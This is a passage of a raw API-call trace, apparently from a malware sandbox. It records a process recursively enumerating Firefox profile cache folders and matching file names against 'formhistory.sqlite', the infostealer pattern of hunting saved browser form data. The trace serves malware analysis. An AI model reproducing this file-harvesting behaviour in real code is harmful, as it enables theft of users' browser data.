0 [0591.128] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.128] lstrlenW (lpString="\\") returned 1 [0591.128] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\CB") returned 84 [0591.128] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.128] lstrlenW (lpString="44E8Cd01") returned 8 [0591.128] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\CB\\") returned 85 [0591.128] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee0968 [0591.128] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.128] StrStrIW (lpFirst="44E8Cd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.128] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.128] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.128] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.128] LocalFree (hMem=0x2edc700) returned 0x0 [0591.128] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.128] lstrcmpiW (lpString1="E1", lpString2=".") returned 1 [0591.128] lstrcmpiW (lpString1="E1", lpString2="..") returned 1 [0591.128] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.128] lstrlenW (lpString="\\") returned 1 [0591.128] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.128] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.128] lstrlenW (lpString="E1") returned 2 [0591.128] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\") returned 82 [0591.128] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.128] LocalFree (hMem=0x2edc700) returned 0x0 [0591.128] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\E1") returned 84 [0591.128] lstrlenW (lpString="\\*.*") returned 4 [0591.128] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\E1") returned 84 [0591.128] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.128] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\E1\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.129] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.129] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.129] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.129] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.129] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.129] lstrlenW (lpString="\\") returned 1 [0591.129] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\E1") returned 84 [0591.129] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.129] lstrlenW (lpString="EBFA5d01") returned 8 [0591.129] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\E1\\") returned 85 [0591.129] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee0ab0 [0591.129] LocalFree (hMem=0x2edc700) returned 0x0 [0591.129] StrStrIW (lpFirst="EBFA5d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.129] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.129] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.129] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.129] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.129] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.129] lstrcmpiW (lpString1="F4", lpString2=".") returned 1 [0591.129] lstrcmpiW (lpString1="F4", lpString2="..") returned 1 [0591.129] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.129] lstrlenW (lpString="\\") returned 1 [0591.129] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0") returned 81 [0591.129] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.129] lstrlenW (lpString="F4") returned 2 [0591.129] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\") returned 82 [0591.129] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.129] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.129] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\F4") returned 84 [0591.129] lstrlenW (lpString="\\*.*") returned 4 [0591.129] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\F4") returned 84 [0591.129] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.129] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\F4\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.130] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.130] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.130] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.130] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.130] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.130] lstrlenW (lpString="\\") returned 1 [0591.130] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\F4") returned 84 [0591.130] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.130] lstrlenW (lpString="9ADE8d01") returned 8 [0591.130] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\0\\F4\\") returned 85 [0591.130] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee0bf8 [0591.130] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.130] StrStrIW (lpFirst="9ADE8d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.130] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.130] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.130] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.130] LocalFree (hMem=0x2edc700) returned 0x0 [0591.130] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.131] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.131] LocalFree (hMem=0x2edc358) returned 0x0 [0591.131] LocalFree (hMem=0x2edc490) returned 0x0 [0591.131] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.131] lstrcmpiW (lpString1="1", lpString2=".") returned 1 [0591.131] lstrcmpiW (lpString1="1", lpString2="..") returned 1 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.131] lstrlenW (lpString="\\") returned 1 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.131] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc490 [0591.131] lstrlenW (lpString="1") returned 1 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.131] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc358 [0591.131] LocalFree (hMem=0x2edc490) returned 0x0 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1") returned 81 [0591.131] lstrlenW (lpString="\\*.*") returned 4 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1") returned 81 [0591.131] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc490 [0591.131] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.131] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.131] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.131] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.131] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.131] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.131] lstrcmpiW (lpString1="03", lpString2=".") returned 1 [0591.131] lstrcmpiW (lpString1="03", lpString2="..") returned 1 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1") returned 81 [0591.131] lstrlenW (lpString="\\") returned 1 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1") returned 81 [0591.131] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.131] lstrlenW (lpString="03") returned 2 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\") returned 82 [0591.131] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.131] LocalFree (hMem=0x2edc700) returned 0x0 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\03") returned 84 [0591.131] lstrlenW (lpString="\\*.*") returned 4 [0591.131] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\03") returned 84 [0591.131] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.131] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\03\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.132] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.132] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.132] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.132] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.132] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.132] lstrlenW (lpString="\\") returned 1 [0591.132] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\03") returned 84 [0591.132] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.132] lstrlenW (lpString="3E20Ad01") returned 8 [0591.132] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\03\\") returned 85 [0591.132] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee0d40 [0591.132] LocalFree (hMem=0x2edc700) returned 0x0 [0591.132] StrStrIW (lpFirst="3E20Ad01", lpSrch="formhistory.sqlite") returned 0x0 [0591.132] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.132] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.132] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.132] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.132] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.132] lstrcmpiW (lpString1="E4", lpString2=".") returned 1 [0591.132] lstrcmpiW (lpString1="E4", lpString2="..") returned 1 [0591.132] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1") returned 81 [0591.132] lstrlenW (lpString="\\") returned 1 [0591.132] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1") returned 81 [0591.132] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.132] lstrlenW (lpString="E4") returned 2 [0591.132] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\") returned 82 [0591.132] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.132] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.132] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\E4") returned 84 [0591.132] lstrlenW (lpString="\\*.*") returned 4 [0591.132] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\E4") returned 84 [0591.132] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.132] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\E4\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.133] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.133] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.133] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.133] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.133] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.133] lstrlenW (lpString="\\") returned 1 [0591.133] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\E4") returned 84 [0591.133] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.133] lstrlenW (lpString="3C9ECd01") returned 8 [0591.133] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\E4\\") returned 85 [0591.133] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee0e88 [0591.133] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.133] StrStrIW (lpFirst="3C9ECd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.133] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.133] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.133] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.133] LocalFree (hMem=0x2edc700) returned 0x0 [0591.133] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.133] lstrcmpiW (lpString1="F6", lpString2=".") returned 1 [0591.133] lstrcmpiW (lpString1="F6", lpString2="..") returned 1 [0591.133] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1") returned 81 [0591.133] lstrlenW (lpString="\\") returned 1 [0591.133] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1") returned 81 [0591.133] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.133] lstrlenW (lpString="F6") returned 2 [0591.133] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\") returned 82 [0591.133] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.133] LocalFree (hMem=0x2edc700) returned 0x0 [0591.133] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\F6") returned 84 [0591.133] lstrlenW (lpString="\\*.*") returned 4 [0591.133] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\F6") returned 84 [0591.133] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.133] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\F6\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.133] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.133] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.133] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.133] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.133] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.133] lstrlenW (lpString="\\") returned 1 [0591.133] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\F6") returned 84 [0591.133] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.133] lstrlenW (lpString="CBD4Dd01") returned 8 [0591.133] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\1\\F6\\") returned 85 [0591.133] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee0fd0 [0591.133] LocalFree (hMem=0x2edc700) returned 0x0 [0591.133] StrStrIW (lpFirst="CBD4Dd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.134] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.134] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.134] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.134] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.134] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.134] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.134] LocalFree (hMem=0x2edc490) returned 0x0 [0591.134] LocalFree (hMem=0x2edc358) returned 0x0 [0591.134] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.134] lstrcmpiW (lpString1="2", lpString2=".") returned 1 [0591.134] lstrcmpiW (lpString1="2", lpString2="..") returned 1 [0591.134] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.134] lstrlenW (lpString="\\") returned 1 [0591.134] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.134] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc358 [0591.134] lstrlenW (lpString="2") returned 1 [0591.134] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.134] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc490 [0591.134] LocalFree (hMem=0x2edc358) returned 0x0 [0591.134] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2") returned 81 [0591.134] lstrlenW (lpString="\\*.*") returned 4 [0591.134] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2") returned 81 [0591.134] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc358 [0591.134] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.134] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.134] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.135] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.135] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.135] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.135] lstrcmpiW (lpString1="48", lpString2=".") returned 1 [0591.135] lstrcmpiW (lpString1="48", lpString2="..") returned 1 [0591.135] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2") returned 81 [0591.135] lstrlenW (lpString="\\") returned 1 [0591.135] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2") returned 81 [0591.135] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.135] lstrlenW (lpString="48") returned 2 [0591.135] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\") returned 82 [0591.135] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.135] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.135] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\48") returned 84 [0591.135] lstrlenW (lpString="\\*.*") returned 4 [0591.135] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\48") returned 84 [0591.135] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.135] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\48\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.135] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.135] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.135] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.135] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.135] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.135] lstrlenW (lpString="\\") returned 1 [0591.135] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\48") returned 84 [0591.135] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.135] lstrlenW (lpString="7555Ad01") returned 8 [0591.135] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\48\\") returned 85 [0591.135] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee1118 [0591.136] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.136] StrStrIW (lpFirst="7555Ad01", lpSrch="formhistory.sqlite") returned 0x0 [0591.136] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.136] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.136] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.136] LocalFree (hMem=0x2edc700) returned 0x0 [0591.136] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.136] lstrcmpiW (lpString1="59", lpString2=".") returned 1 [0591.136] lstrcmpiW (lpString1="59", lpString2="..") returned 1 [0591.136] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2") returned 81 [0591.136] lstrlenW (lpString="\\") returned 1 [0591.136] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2") returned 81 [0591.136] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.136] lstrlenW (lpString="59") returned 2 [0591.136] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\") returned 82 [0591.136] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.136] LocalFree (hMem=0x2edc700) returned 0x0 [0591.136] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\59") returned 84 [0591.136] lstrlenW (lpString="\\*.*") returned 4 [0591.136] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\59") returned 84 [0591.136] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.136] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\59\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.136] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.136] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.136] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.136] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.136] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.136] lstrlenW (lpString="\\") returned 1 [0591.136] 